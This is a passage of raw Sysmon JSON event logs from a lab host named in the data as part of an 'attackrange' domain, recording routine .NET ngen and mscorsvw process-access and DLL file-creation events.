C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.273","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-0010D8AD0A00}","TargetProcessId":"4476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6738,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.273\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-0010D8AD0A00}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.273","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-0010D8AD0A00}","TargetProcessId":"4476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6739,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.289\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-0010D8AD0A00}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.289","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-0010D8AD0A00}","TargetProcessId":"4476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6740,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:11.586\r\nProcessGuid: {41C8662E-21FB-5F25-0000-0010D8AD0A00}\r\nProcessId: 4476\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\117c-0\\System.Xml.Linq.dll\r\nCreationUtcTime: 2020-08-01 08:04:11.586","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:11.586","ProcessGuid":"{41C8662E-21FB-5F25-0000-0010D8AD0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\117c-0\\System.Xml.Linq.dll","CreationUtcTime":"2020-08-01 08:04:11.586","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6741,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.632\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-0010B7B10A00}\r\nTargetProcessId: 4284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.632","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-0010B7B10A00}","TargetProcessId":"4284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6742,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.632\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-0010B7B10A00}\r\nTargetProcessId: 4284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.632","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-0010B7B10A00}","TargetProcessId":"4284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6743,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-0010B7B10A00}\r\nTargetProcessId: 4284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-0010B7B10A00}","TargetProcessId":"4284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6744,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.914\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-00105BB50A00}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.914","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-00105BB50A00}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6745,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.914\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-00105BB50A00}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.914","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-00105BB50A00}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6746,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.914\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-00105BB50A00}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 